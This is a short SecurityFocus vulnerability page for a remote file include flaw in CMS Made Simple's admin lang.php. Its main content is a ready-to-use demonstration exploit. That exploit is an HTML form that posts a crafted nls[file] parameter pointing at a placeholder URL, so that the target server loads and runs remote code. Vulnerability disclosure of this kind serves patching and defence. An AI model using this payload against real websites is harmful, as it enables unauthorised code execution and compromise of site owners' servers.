Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

CMS Made Simple Lang.PHP Remote File Include Vulnerability

No exploit is required:

A demonstration exploit html file is provided:

example.html:
<form action="http://www.example.com/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF







 

Privacy Statement
Copyright 2009, SecurityFocus